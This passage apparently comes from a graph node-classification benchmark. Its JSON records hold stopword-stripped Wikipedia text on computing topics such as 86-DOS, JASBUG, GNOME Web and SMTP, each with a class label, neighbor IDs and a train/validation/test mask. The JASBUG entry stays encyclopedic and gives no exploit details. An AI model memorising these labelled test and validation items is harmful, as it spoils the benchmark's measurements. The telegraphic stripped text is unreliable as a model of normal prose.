architecture development version stamp differentiation stamp example version hardened extra security user must provide catalyst snapshot portage tree point target profile branch portage tree portage tree hierarchy directories oriented names categories packages package managers use normal everyday maintenance software fedora linux uses revisor enable user compose customized installation live media arch linux uses archiso remaster arch installation target machine rare hardware internet connection cases modified deployment occur multiple times remastered isos bootable also used system rescue demonstrations arch setup task testing new software installed rollout custom installation onto many machines etc arch linux wiki also gives procedure manually archiso automatically involves copying portions installation iso using linux commands mount mkdir chroot mksquashfs arch package manager pacman mx linux uses mx-snapshot gui tool remaster live installation single .iso file quickly conveniently cloned image bootable disk usb-thumbdrive maintaining settings way installation conveniently migrated distributed new hard-disk usb-thumbdrive requiring next administrative effort since advanced method copying file system developed antix-linux utilizing bind-mounts performs heavy lifting snapshot also serves essentially complete convenient backup installation examples section show historical operational aspects software remastering occurred microsoft windows 98lite remastering tool windows 95 windows 98 windows without internet explorer written shane brooks written response microsoft claim antitrust proceedings ie integrated windows removed without breaking features 98lite created 1998 original release windows 98 necessity since time brooks slower laptop computer ran windows 95 operating system fine windows 98 simply slow brooks liked stability windows 98 offered well new features need internet explorer browser original 98lite simple dos based installer ran windows 98 installation installer made modifications fresh installation windows preventing installation internet explorer active desktop installation first release 98lite required user extract certain files windows 95 disk 98lite uses windows 95 shell second program called shell swap swapped explorer shell windows 95 explorer contain web features 98 explorer therefore considerably faster lightweight designed existing installations windows 98 original 98lite designed new installation windows third program converted required components addable removable options version 2.0 98lite three programs merged combined single program ie remover combined components converter making ie uninstallable reinstallable add/remove programs control panel applet components user could also choose windows 95 shell keep internet explorer installed user three installation options sleek option allowed user install 98lite windows 95 shell like original release user could choose chubby used windows 98 shell active desktop features disabled final option overweight installed 98lite windows 98 shell nothing disabled internet explorer still removed version 3.0 added support windows 98 second edition upgraded version windows 98 internet explorer 5.0 made 98lite 1.0 2.0 obsolete current 4.x line many improvements including bugfixes support windows installing version directx 98lited windows requires least temporary presence pc health otherwise directx refuses install finishing installation attempt error message directx copy required file revenge mozilla another free application removes internet explorer windows 98 restores windows 95 explorer.exe two versions one original windows 98 release another win98 se version windows longer supported updated also company spun lite-pc produces windows 98 installations small enough easily fit embedded microchips small 8mb using 98eos also many free alternatives mindows nano98 provide either smaller file sizes broad functionality creator 98lite also built similar tool windows 2000 windows xp called 2000-xplite removes windows components intended removable includes out-of-box experience internet explorer outlook express windows media player others 2000-xplite also allows tweaks operating system enhance performance 2000-xplite use text interface 98lite like 98lite 2000-xplite installs windows components removes unwanted components installation nlite designed remove unwanted windows 2000 windows xp 32 64 bit windows server 2003 system components create cut-down customized installation cds nlite built dino nuhagić free personal use purchase options available september 2014 beta-version windows 7 later publicly released user chooses wanted 'functionality options nlite attempts warn user removing dependent components creation custom installer also lets users add device drivers integrate service packs windows updates well remove drivers obsolete unwanted hardware remove unwanted language keyboard options unwanted applications allows customization installation process including product key entry administrator password regional settings creating user account names options normally set control panel installation well numerous 'tweaks various degrees 'unattended installation also possible end installer creation process nlite burn installation direct cd create .iso image later use also option saving loading previous session choices .txt format speed checking modification custom installation required since custom installer contain unwanted components lead smaller installation package faster installation considerable benefit staff still using manual 'roll approach without benefit microsoft sysprep software-minimized cds also allow windows system installed hard disks 512 mb size hfslip open source command line hotfix service pack slipstreaming tool designed update windows 2000 windows xp windows server 2003 installation sources addition hotfixes service packs hfslip slipstreams microsoft updates internet explorer directx 9.0c windows media player windows media codecs also integrates third-party device driver updates including driverpacks hfslip slipstreams replaces original files newer versions found updates microsoft download center hfslip places hotfixes non-standard required special installation procedure svcpack folder installed automatically near end windows setup may 2010 hfslip longer developed main website taken autostreamer free slipstreaming tool windows xp integrate service pack windows xp installation cd-rom image main interface autostreamer wizard guides user slipstreaming process according pc world simplifies once-intimidating chore slipstreaming windows xp cd—producing xp sp2 cd sp1 even vintage original xp cd driverpacks project open source project started wim leers jeff herre leers released first pack 2005 collections device drivers called driverpacks exist cpu chipsets cpu graphics/video ethernet mass storage/removable/usb audio/sound wireless wi-fi/wlan hardware driverpacks base tool integrates driverpacks one uniform windows installation cd works every piece hardware needs additional device drivers installation compatible windows versions based nt 5.1 32-bit kernel windows 2000 windows xp windows server 2003 windows vista windows 7 vlite windows vista 32 64 bit version nlite create cut-down customized installation cd bootable usb stick people reported success using vlite windows 7 vlite fully compatible windows 7 intended support windows 7 sept. 2014 ntlite released support windows 7 later ntlite software tool creator nlite support windows 7 windows 8 windows 8.1 windows 10. ntlite also prevents components installed remove already-installed system using paid version win toolkit create cut-down customized installation cd bootable usb stick windows 7 later versions",
    "neighbors": [
      3073,
      2051,
      9353,
      6797,
      912,
      9253,
      10149,
      4775,
      3496,
      823,
      10192,
      10839,
      9693,
      10084,
      4074,
      6634,
      10860,
      5618,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 9903,
    "label": 2,
    "text": "Microsoft_Push_Notification_Service:microsoft push notification service microsoft push notification service commonly referred mpns mobile service developed microsoft allows developers send push data servers windows phone applications mpns natively supported applications target windows phone 8 operating system microsoft announced windows notification service windows 8 windows phone 8.1 2011 effectively replacing mpns service mpns used applications installed windows phone 8.1 source code migrated microsoft silverlight application modified target windows phone 8.1 already registered use mpns upgrade mpns natively designed use windows phone 8 applications implement service allows developers send toast notifications well update tile image flip notification text application windows metro start screen tile accomplished developers sending post messages mpns server network request relevant content user typically must allow data notifications received application register mpns notification data mpns implemented send notification data using encrypted channel developer purchases ssl certificate third-party provider uploads private key certificate data microsoft developer portal account otherwise mpns implemented send notification data using unencrypted channel applications utilize unencrypted channels rate size limitations notification requests content updated displayed device limits lifted purchasing ssl certificate switching utilize mpns encryption mpns consists servers internal interfaces maintain store channel uri identifiers device information authenticate post requests received developer servers enqueue deliver requested data mobile devices application registers data notifications receives unique channel uri identifiers mpns network identifier used application developer third-party server reference device particular data delivery request sent mobile device receives channel uri identifier sent developer server stored server sends post message mpns network data delivery channel uri identifier included within message payload along data deliver parameter options specified mpns network authenticate identifier enqueue data delivery mobile device",
    "neighbors": [
      8262,
      11559,
      9448,
      7983,
      7701
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9904,
    "label": 4,
    "text": "JASBUG:jasbug jasbug security bug disclosed february 2015 affecting core components microsoft windows operating system vulnerability dated back 2000 affected supported editions windows server 2003 windows vista windows server 2008 windows 7 windows server 2008 r2 windows 8 windows server 2012 windows rt windows 8.1 windows server 2012 r2 windows rt 8.1 vulnerability allows hackers remotely take control windows devices connect active directory domain jasbug registered common vulnerabilities exposures system industrial control systems cyber emergency response team part department homeland security issued ics-alert-15-041-01 warning control systems owners expedite applying critical jasbug fixes microsoft released two patches ms15-011 ms15-014 address jasbug day vulnerability disclosed fixes took microsoft year develop deploy due complexity jasbug vulnerability time disclosure 300 million computers believed vulnerable exploit jasbug disclosed public microsoft part patch tuesday february 10th 2015 vulnerability initially reported microsoft january 2014 jeff schmidt founder jas global advisors microsoft publicly announced security vulnerability garnered name jasbug reference role jas global advisors played discovering exploit 2014 jas global advisors working engagement internet corporation assigned names numbers icann organization governing standards internet research potential technical issues surrounding rollout new generic top level domains gtlds internet working research jas global advisors business partner simmachines uncovered vulnerability applying big data analytical techniques large technical data sets jasbug principally affects business government users home users less likely affected jasbug use domain-configured computers white house cybersecurity advisor michael daniel spoke importance addressing jasbug meeting information security privacy advisory board national institute standards technology office management budget department homeland security immediately took steps fix vulnerability federal networks suzanne e. spaulding serving secretary national protection programs directorate nppd department homeland security mentioned jasbug february 2015 house representatives hearing touched potential effect dhs funding hiatus aftermath jasbug various government agencies updated technical specifications mitigate exploit risks example united states department veteran affairs decided may 2015 unapprove use windows server 2003 based jasbug risks according microsoft exploit takes advantage group policy receives applies policy data domain-joined system connects domain controller one likely exploitation flaw involves deceiving user domain-configured system network controlled hacker despite potential effect indication jasbug vulnerability ever used cyberhackers access corporate government computers jasbug affects windows vista windows server 2008 windows 7 windows server 2008 r2 windows 8 windows 8.1 windows server 2012 windows server 2012 r2 windows rt windows rt 8.1 windows server 2003 also affected jasbug patch platform microsoft indicated feasible build fix version jasbug also affects windows xp windows 2000 patch made available operating systems longer supported microsoft unlike high-profile vulnerabilities like heartbleed shellshock gotofail poodle jasbug design problem implementation problem making type vulnerability unusual much difficult fix fix required microsoft re-engineer core components operating system add several new features including additional hardening group policy feature organizations use centrally manage windows systems applications user settings active directory environments microsoft able fix jasbug flaw windows server 2003 systems noting architecture properly support fix provided update exist windows server 2003 systems making infeasible build fix windows server 2003 unpatched unpatchable platforms may vulnerable jasbug security firms like symantec recommend organizations use intrusion prevention systems ips monitor network activity possible malicious jasbug traffic",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      2709,
      1688,
      2717,
      9375,
      9395,
      8886,
      3789,
      5325,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      929,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Train"
  },
  {
    "node_id": 9905,
    "label": 5,
    "text": "Archie_(search_engine):archie search engine archie tool indexing ftp archives allowing people find specific files considered first internet search engine original implementation written 1990 alan emtage postgraduate student mcgill university montreal bill heelan studied concordia university montreal worked mcgill university time archie service began project students volunteer staff mcgill university school computer science 1987 peter deutsch systems manager school emtage heelan asked connect school computer science internet earliest versions archie written alan emtage simply contacted list ftp archives regular basis contacting roughly month waste many resources remote servers requested listing listings stored local files searched using unix grep command name derives word archive without v. alan emtage said contrary popular belief association archie comics despised despite early internet search technologies jughead veronica named characters comics anarchie one earliest graphical ftp clients named ability perform archie searches archie developed tool mass discovery concept simple developers populated engine servers databases anonymous ftp host directories used find specific file titles since list plugged searchable database websites bill heelan peter deutsch wrote script allowing people log search collected information using telnet protocol host archie.mcgill.ca 132.206.2.3 later efficient front- back-ends developed system spread local tool network-wide resource popular service available multiple sites around internet collected data would exchanged neighbouring archie servers servers could accessed multiple ways using local client archie xarchie telnetting server directly sending queries electronic mail later via world wide web interface zenith fame archie search engine accounted 50 montreal internet traffic 1992 emtage along peter deutsch financial help mcgill university formed bunyip information systems world first company expressly founded dedicated providing internet information services licensed commercial version archie search engine used millions people worldwide bill heelan followed bunyip soon together bibi ali sandro mazzucato part so-called archie group group significantly updated archie database indexed web-pages work search engine ceased late 1990s legacy archie server still maintained active historic purposes poland university warsaw interdisciplinary centre mathematical computational modelling",
    "neighbors": [
      7138,
      7364,
      3110,
      11112,
      5492,
      119,
      3191,
      3961
    ],
    "mask": "Test"
  },
  {
    "node_id": 9906,
    "label": 7,
    "text": "StorSimple:storsimple storsimple privately held company based santa clara california marketing cloud storage storsimple funded venture capital index ventures redpoint ventures ignition partners mayfield fund total 31.5 million founded 2009 former cisco systems brocade communications systems executives ursheet parikh guru pangal storsimple marketed cloud storage gateway computer appliance called cloud-integrated storage cis approach claimed integrate primary storage data deduplication automated tiered storage data across local cloud storage data compression encryption significantly faster data backup disaster recovery times storsimple certified microsoft windows server 2008 vmware integrated cloud storage amazon google microsoft rackspace 2012 storsimple considered forefront genre appliance iscsi interface using 10 gigabit ethernet used serial ata disks well solid-state drives april 2012 storsimple announced replacement 2u 5010 2.5tb raw capacity 7010 5tb raw models 5020 2tb raw capacity 7020 4tb 5520 10tb 4u 7520 20tb october 16 2012 microsoft agreed acquire storsimple finalized november 15 acquisition microsoft integrated storsimple azure product suite refreshed hardware launching 8100 8600 on-premise fixed-configuration storage arrays 2014 8100 offered 10tb 40tb locally depending data compression data de-duplication 200tb maximum capacity inclusive azure cloud storage 8600 offered 40tb 100tb locally 500tb inclusive cloud storage like predecessors appliances combined solid state standard disk drives virtualised version platform running virtual machine azure cloud initially marketed 1100 re-branded 8010 2015 replaced 8020 offering 64tb maximum compared predecessor ’ 30tb",
    "neighbors": [
      6153,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      6307,
      6565,
      9766,
      5159,
      6444,
      8495,
      3121,
      6834,
      7863,
      7352,
      3773,
      2496,
      4289,
      11201,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9907,
    "label": 2,
    "text": "86-DOS:86-dos 86-dos discontinued operating system developed marketed seattle computer products scp intel 8086-based computer kit initially known qdos quick dirty operating system name changed 86-dos scp started licensing operating system 1980 86-dos command structure application programming interface imitated digital research cp/m operating system made easy port programs latter system licensed purchased microsoft developed ms-dos pc dos 86-dos created sales seattle computer products 8086 computer kit demonstrated june 1979 shipped november languishing due absence operating system software scp could sell board microsoft standalone disk basic-86 microsoft developed prototype scp hardware scp wanted offer 8086-version cp/m digital research announced release date uncertain first time digital research lagged behind hardware developments two years earlier slow adapt cp/m new floppy disk formats hard disk drives april 1980 scp assigned 24-year-old tim paterson develop substitute cp/m-86 using cp/m-80 manual reference paterson modeled 86-dos architecture interfaces adapted meet requirements intel 8086 16-bit processor easy partially automated source-level translatability many existing 8-bit cp/m programs porting either dos cp/m-86 equally difficult eased fact intel already published method could used automatically translate software intel 8080 processor cp/m designed new 8086 instruction set time made number changes enhancements address saw cp/m shortcomings cp/m cached file system information memory speed required user force update disk removing user forgot disk would become corrupt paterson took safer slower approach updating disk operation cp/m pip command copied files supported several special file names referred hardware devices printers communication ports paterson built names operating system device files program could use gave copying program intuitive name copy rather implementing cp/m file system drew microsoft standalone disk basic-86 file allocation table fat file system mid-1980 scp advertised 86-dos priced 95 owners 1290 8086 board 195 others touted software ability read zilog z80 source code cp/m disk translate 8086 source code promised minor hand correction optimization needed produce 8086 binaries october 1980 ibm developing would become original ibm personal computer cp/m far popular operating system use time ibm felt needed cp/m order compete ibm representatives visited digital research discussed licensing digital research licensing representative dorothy kildall née mcewen hesitated sign ibm non-disclosure agreement although nda later accepted digital research would accept ibm proposal 250,000 exchange many copies ibm could sell insisting usual royalty-based plan later discussions ibm bill gates gates mentioned existence 86-dos ibm representative jack sams told get license microsoft purchased non-exclusive license 86-dos seattle computer products december 1980 25,000 may 1981 hired tim paterson port system ibm pc used slower less expensive intel 8088 processor specific family peripherals ibm watched developments daily submitting 300 change requests accepted product wrote user manual july 1981 month pc release microsoft purchased rights 86-dos scp 50,000 met ibm main criteria looked like cp/m easy adapt existing 8-bit cp/m programs run notably thanks trans command would translate source files 8080 8086 machine instructions microsoft licensed 86-dos ibm became pc dos 1.0 license also permitted microsoft sell dos companies deal spectacularly successful scp later claimed court microsoft concealed relationship ibm order purchase operating system cheaply scp ultimately received 1 million settlement payment digital research founder gary kildall examined pc dos found duplicated cp/m programming interface wanted sue ibm time claimed pc dos product however digital research attorney believe relevant law clear enough sue nonetheless kildall confronted ibm persuaded offer cp/m-86 pc exchange release liability controversy continued surround similarity two systems perhaps sensational claim came jerry pournelle said kildall personally demonstrated dos contained cp/m code entering command dos displayed kildall name pournelle never revealed command nobody come forward corroborate story 2004 book kildall says used encrypted message demonstrate manufacturers copied cp/m say found message dos instead kildall memoir source book pointed well-known interface similarity paterson insists 86-dos software original work denied referring otherwise using cp/m code writing 2004 book appeared sued authors publishers defamation court ruled summary judgment defamation occurred book claims opinions based research provably false following list commands supported 86-dos 1982 ibm asked microsoft release version dos compatible hard disk drive pc dos 2.0 almost complete rewrite dos march 1983 little 86-dos remained enduring element 86-dos primitive line editor edlin remained editor supplied microsoft versions dos june 1991 release ms-dos 5.0 included text-based user interface editor called ms-dos editor based qbasic edlin still used contemporary machines since emulated dos environment windows 10 32 bit seattle computer products 86-dos supported fat12 filesystem range 8-inch 5.25-inch floppy disk drives s-100 floppy disk controller hardware manufactured cromemco tarbell electronics north star computers western digital fd1771-based cromemco tarbell boards supported one-sided single-density soft-sectored drives tarbell double-density board utilizing fd1791 supported well later scp offered advanced floppy disk controllers like disk master series 86-dos take advantage fat id byte bios parameter block bpb later dos versions distinguish different media formats instead different drive letters hard-coded time compilation associated different physical floppy drives sides densities meant depending type disk addressed certain drive letter recognized correctly concept later emulated flexibility driver.sys dos 3.x later versions two logical format variants 86-dos 12-bit fat format existed — original format 16-byte directory entries later format since 86-dos 0.42 32-byte directory entries second one logically compatible fat12 format known since release ms-dos pc dos ms-dos still mount volumes absence bpb falls back retrieve fat id fat entry design fat file system clust 0cluster 0 choose among hard-coded disk geometry profiles formats volume formatted ms-dos would otherwise supported systems typically also formats id located first byte logical sector 1 — volume second sector physical cylinder-head-sector chs address 0/0/2 logical block addressing lba address 1 — since ms-dos assumes single reserved sector boot sector 86-dos reserved sectors area significantly larger whole tracks therefore prototypical fat id located elsewhere disk making impossible ms-dos retrieve even would hard-coded disk profile associated would take larger reserved sectors region 86-dos account cp/m 2 floppy media readable rdcpm 86-dos offer specific support fixed disks third-party solutions form hard disk controllers corresponding i/o system extensions 86-dos available companies like tallgrass technologies making hard disks accessible similar superfloppies within size limits fat12 file system various oem versions ms-dos 1.2x 2.x supported number similar 8.0 fat12 floppy disk formats well although identical supported 86-dos disk formats supported one last versions developed tim paterson microsoft ms-dos 1.25 march 1982 scp gazelle computer scp controller cromemco 16fdc controller default version supported ms-dos-compatible variants 8.0 formats single reserved sector could built provide two extra drive letters read write floppies previous scp 86-dos 8.0 disk formats since 0.42 well 1984 seattle computer products released oem version ms-dos 2.0 scp s-100 computer scp-500 disk master floppy controller added support 5.25 dd/1s 180 kb dd/2s 360 kb fat12 formats supported older formats well although possibly parameters modified compared ms-dos 1.25",
    "neighbors": [
      6148,
      2055,
      10257,
      6675,
      7187,
      10776,
      25,
      8729,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      8262,
      10333,
      97,
      8298,
      8301,
      9840,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      4735,
      2179,
      10883,
      6797,
      7317,
      9366,
      6296,
      7325,
      9887,
      5293,
      3248,
      178,
      9907,
      6837,
      8388,
      9932,
      5840,
      1750,
      7382,
      8410,
      1253,
      5359,
      5363,
      2811,
      3323,
      3841,
      10499,
      780,
      1804,
      273,
      11539,
      10016,
      2339,
      2345,
      7983,
      823,
      4409,
      7483,
      7486,
      11075,
      4423,
      5457,
      11601,
      4441,
      10590,
      8551,
      3953,
      5492,
      2933,
      3970,
      394,
      3978,
      7057,
      11667,
      8092,
      11683,
      421,
      11184,
      6075,
      6078,
      9151,
      4548,
      8136,
      5067,
      9166,
      4563,
      477,
      3056,
      6128,
      499,
      5619,
      10235
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9908,
    "label": 5,
    "text": "GNOME_Web:gnome web gnome web called epiphany 2012 free open-source lightweight web browser based webkitgtk developed gnome linux unix-like systems browser forked galeon 2002 developers disagreements galeon growing complexity since developed part gnome core applications uses gnome technology settings applicable follows gnome human interface guidelines gnome web originally used mozilla gecko version 2.28 starting version 2.20 september 2007 switched webkitgtk due technical problems gecko change allows relatively small developer community maintain sufficient level modern web standards support features gnome web includes best integration gnome reuse gnome configuration settings built-in integration gnome keyring securely store passwords first-class support new linux technologies like major gtk versions wayland small package size 2mb debian ubuntu full multimedia support using gstreamer reader mode/reading mode since v3.30 september 2018 mouse gestures smart bookmarks web application integration user desktop management page support google safe browsing since v3.28 2018-03 gnome web default web browser elementary os recommended excellent web application integration security benefits related marco pesenti gritti initiator galeon originally developed epiphany 2002 fork galeon fork occurred divergent aims gritti rest galeon development team new features gritti regarded galeon monolithic design number user-configurable features factors limiting galeon maintainability user base expansion rest galeon developers wanted see features added time gnome project created gnome human interface guidelines promoted simplification user interfaces galeon oriented towards power users developers saw implementation guidelines unacceptable result gritti created new browser based galeon codebase non-mission-critical features removed intended epiphany comply fully gnome human interface guidelines simple user-interface epiphany theme settings uses gnome settings specified gnome control center gritti explained motivations galeon continued fork lost momentum due remaining developers failure keep new features changes mozilla introduced galeon development finally stalled developers decided work set extensions bring galeon advanced features epiphany instead epiphany early philosophy included commitment creating web browser specifically gnome gritti ended work epiphany project gnome team led xan lopez christian persch jean-françois rameau direct project gritti died cancer 23 may 2015 promote epiphany default web browser linux distributions gnome default desktop environment distros offer firefox instead minimalist distributions epiphany installed gnome meta-package packages group first version epiphany released december 24 2002 epiphany initially used gecko layout engine mozilla project display web pages provided gnome integrated graphical user interface gecko instead mozilla xul interface development process epiphany mainly focused numerous small usability improvements notable new text entry widget first appeared 1.8 stable version series new widget supported icons inside text area reduced amount screen space needed present information improved gnome integration second major milestone version 1.0 epiphany development 2.14 release first epiphany release followed gnome version numbering also featured network awareness using networkmanager smart bookmarks-related improvements possibility compiled xulrunner latter critical previously epiphany could use firefox mozilla/seamonkey layout engine provider could installed alongside one browsers xulrunner support made possible install epiphany sole web browser system development process suffered major problems related gecko backend address issues july 2007 epiphany team added support webkit alternative rendering engine epiphany backend development advanced epiphany team announced would stop using gecko rendering engine proceed using webkit size development team complexity porting whole browser new backend caused epiphany re-release version 2.22 bugfixes instead actual development code browser development remained stagnant project team announced epiphany 2.26 would final gecko-based version eventually september 2009 webkit-powered epiphany 2.28 released part gnome 2.28 gnome 3.4 release epiphany renamed web however name epiphany still used internally development bug tracking source code package remains epiphany-browser debian-based distros epiphany redhat-based distros gnome web based webkit browser engine provides support html 4 xhtml css 1 2 substantial degree implementation html5 css 3 features web inspector html javascript debugging tool npapi including adobe flash icedtea-web plug-ins support web reuses gnome frameworks settings therefore user interface theme gnome default theme network settings gnome networkmanager configuration printing gnome printing system settings gsettings gnome default applications settings used internet media types handling built-in preference manager web designed present user basic browser-specific settings advanced configuration done stand-alone gsettings configurator tools gnome default dconf command line dconf-editor graphical follows gnome human interface guidelines follows platform-wide design changes example web 3.4 release menu application-wide actions moved gnome shell top panel application menu menubar replaced super menu button triggers display window-specific menu entries browsers feature hierarchical folder-based bookmark system web uses categorized bookmarks single bookmark web exist multiple categories web browsers gnome computer software special category includes bookmarks yet categorized another innovative concept supported web though originally galeon smart bookmarks take single argument specified address bar textbox toolbar bookmarks along browsing history accessed address bar find-as-you-type manner gnome web extensible official third-party extensions version 3.6 plug-in system called web extensions package distributed developers gnome web contained official extensions version 3.8 system removed due problems stability maintainability popular extensions ad blocking moved core application instead since gnome 3.2 released september 2011 web allows creating application launchers web applications subsequent invocation launcher brings plain site-specific browser single instance web limited one domain off-site links opening normal browser launcher created way accessible desktop limited gnome shell instance may used unity used ubuntu feature facilitates integration desktop world wide web goal web developers similar features found windows version google chrome purpose mozilla foundation previously developed standalone application mozilla prism superseded project chromeless web applications managed within epiphany main instance applications deleted page accessible special uri applications approach supposed temporary solution common gnome-wide application management intended implemented gnome 3.4 rolled since gnome 3.26 web support firefox sync allows users sync bookmarks history passwords open tabs firefox sync shared copy firefox web user signs firefox sync since gnome 3.28 gnome web support google safe browsing help prevent users visiting malicious websites component gnome desktop environment web neither software hardware dependencies beyond gnome platform though gnome project list minimum system requirements states gnome 3 run modern computer gnome web run many hardware platforms including i386 amd64 several instruction set architectures reviewing webkit-powered epiphany 2.28 september 2009 ryan paul ars technica said epiphany quite snappy gnome 2.28 scores 100/100 acid3 test using webkit help differentiate epiphany firefox shipped default browser major linux distributors reviewing epiphany 2.30 july 2010 jack wallen described efficient different noted problem crashes first started working epiphany crashed sites visited little research little debugging realized issue javascript epiphany current release strange reason n't like javascript way around disable javascript yes means lot features wo n't work lot sites – also means sites load faster wo n't prone issues like crashing browser wallen concluded positively browser although epiphany n't fully replaced chrome firefox one-stop-shop browser use much would previously small footprint fast startup clean interface march 2011 veronica henry reviewed epiphany 2.32 saying fair would hard sell primary desktop browser users fact n't even setting let designate default browser instance need fire lighting-fast browser quick surfing epiphany trick noted though still use firefox primary browser lately seems run snail pace one first things noticed epiphany quickly launches subsequent page loads system equally fast henry criticized epiphany short list extensions singling lack firebug deficiency web instead supports web inspector offered webkit engine similar functionality april 2012 ryan paul ars technica used web example criticism gnome 3.4 design decisions aside poor initial discoverability panel menu model works reasonably well simple applications ... unfortunately n't scale well complex applications best example approach pose difficulties gnome default web browser ... application functionality split across two completely separate menus constitute usability improvement addressed later versions single unified menu october 2016 review bertel king jr. noted makeuseof later versions offer best integration find gnome shell lacks add-ons found mainstream browsers users like minimalism speed tab isolation prevents one misbehaving site crashing entire browser",
    "neighbors": [
      513,
      6657,
      9736,
      10255,
      2579,
      6171,
      2076,
      9757,
      7713,
      6691,
      3110,
      6694,
      10791,
      9770,
      559,
      2611,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      3649,
      5707,
      4177,
      10834,
      5205,
      6231,
      8281,
      6747,
      6237,
      1642,
      9834,
      9841,
      115,
      9843,
      3189,
      3191,
      119,
      4728,
      637,
      1664,
      11394,
      2182,
      8848,
      9872,
      11418,
      10910,
      8351,
      4775,
      7340,
      9394,
      185,
      11449,
      4797,
      708,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      5356,
      5358,
      9451,
      11000,
      8443,
      9987,
      5380,
      7943,
      6413,
      1807,
      3859,
      5397,
      278,
      3350,
      7450,
      7965,
      1822,
      9507,
      1834,
      7983,
      823,
      7488,
      10057,
      11082,
      10060,
      2893,
      11112,
      8554,
      4459,
      8557,
      3961,
      6528,
      2945,
      3971,
      3462,
      8584,
      4490,
      2955,
      6028,
      10126,
      7572,
      5536,
      5026,
      4013,
      8621,
      944,
      5054,
      10174,
      6086,
      3015,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      5095,
      8169,
      494,
      1520,
      7152,
      9712,
      6133,
      5622,
      5114,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9909,
    "label": 5,
    "text": "Simple_Mail_Transfer_Protocol:simple mail transfer protocol simple mail transfer protocol smtp communication protocol electronic mail transmission internet standard smtp first defined 1982 updated 2008 extended smtp additions protocol variety widespread use today mail servers message transfer agents use smtp send receive mail messages proprietary systems microsoft exchange ibm notes webmail systems outlook.com gmail yahoo mail may use non-standard protocols internally use smtp sending receiving email outside systems smtp servers commonly use transmission control protocol port number 25 user-level email clients typically use smtp sending messages mail server relaying typically submit outgoing email mail server port 587 465 per rfc 8314 retrieving messages imap pop3 standard proprietary servers also often implement proprietary protocols e.g. exchange activesync various forms one-to-one electronic messaging used 1960s users communicated using systems developed specific mainframe computers computers interconnected especially u.s. government arpanet standards developed permit exchange messages different operating systems smtp grew standards developed 1970s smtp traces roots two implementations described 1971 mail box protocol whose implementation disputed discussed rfcs sndmsg program according ray tomlinson bbn invented tenex computers send mail messages across arpanet fewer 50 hosts connected arpanet time implementations include ftp mail mail protocol 1973 development work continued throughout 1970s arpanet transitioned modern internet around 1980 jon postel proposed mail transfer protocol 1980 began remove mail reliance ftp smtp published november 1981 also postel smtp standard developed around time usenet one-to-many communication network similarities smtp became widely used early 1980s time complement unix unix copy program uucp mail better suited handling email transfers machines intermittently connected smtp hand works best sending receiving machines connected network time use store forward mechanism examples push technology though usenet newsgroups still propagated uucp servers uucp mail transport virtually disappeared along bang paths used message routing headers sendmail released 4.1cbsd right one first mail transfer agents implement smtp time bsd unix became popular operating system internet sendmail became common mta mail transfer agent popular smtp server programs include postfix qmail novell groupwise exim novell netmail microsoft exchange server oracle communications messaging server message submission smtp-auth introduced 1998 1999 describing new trends email delivery originally smtp servers typically internal organization receiving mail organization outside relaying messages organization outside time went smtp servers mail transfer agents practice expanding roles become message submission agents mail user agents relaying mail outside organization e.g company executive wishes send email trip using corporate smtp server issue consequence rapid expansion popularity world wide web meant smtp include specific rules methods relaying mail authenticating users prevent abuses relaying unsolicited email spam work message submission originally started popular mail servers would often rewrite mail attempt fix problems example adding domain name unqualified address behavior helpful message fixed initial submission dangerous harmful message originated elsewhere relayed cleanly separating mail submission relay seen way permit encourage rewriting submissions prohibiting rewriting relay spam became prevalent also seen way provide authorization mail sent organization well traceability separation relay submission quickly became foundation modern email security practices protocol started purely ascii text-based deal well binary files characters many non-english languages standards multipurpose internet mail extensions mime developed encode binary files transfer smtp mail transfer agents mtas developed sendmail also tended implemented 8-bit-clean alternate send eight strategy could used transmit arbitrary text data 8-bit ascii-like character encoding via smtp mojibake still problem due differing character set mappings vendors although email addresses still allowed ascii 8-bit-clean mtas today tend support 8bitmime extension permitting binary files transmitted almost easily plain text recently smtputf8 extension created support utf-8 text allowing international content addresses non-latin scripts like cyrillic chinese many people contributed core smtp specifications among jon postel eric allman dave crocker ned freed randall gellens john klensin keith moore email submitted mail client mail user agent mua mail server mail submission agent msa using smtp tcp port 587 mailbox providers still allow submission traditional port 25 msa delivers mail mail transfer agent mail transfer agent mta often two agents instances software launched different options machine local processing done either single machine split among multiple machines mail agent processes one machine share files processing multiple machines transfer messages using smtp machine configured use next machine smart host process mta smtp server right boundary mta uses domain name system dns look mail exchanger record mx record recipient domain part email address right mx record contains name target host based target host factors mta selects exchange server see article mx record mta connects exchange server smtp client message transfer occur single connection two mtas series hops intermediary systems receiving smtp server may ultimate destination intermediate relay stores forwards message gateway may forward message using protocol smtp hop formal handoff responsibility message whereby receiving server must either deliver message properly report failure final hop accepts incoming message hands mail delivery agent mda local delivery mda saves messages relevant mailbox format sending reception done using one multiple computers diagram mda depicted one box near mail exchanger box mda may deliver messages directly storage forward network using smtp protocol local mail transfer protocol lmtp derivative smtp designed purpose delivered local mail server mail stored batch retrieval authenticated mail clients muas mail retrieved end-user applications called email clients using internet message access protocol imap protocol facilitates access mail manages stored mail post office protocol pop typically uses traditional mbox mail file format proprietary system microsoft 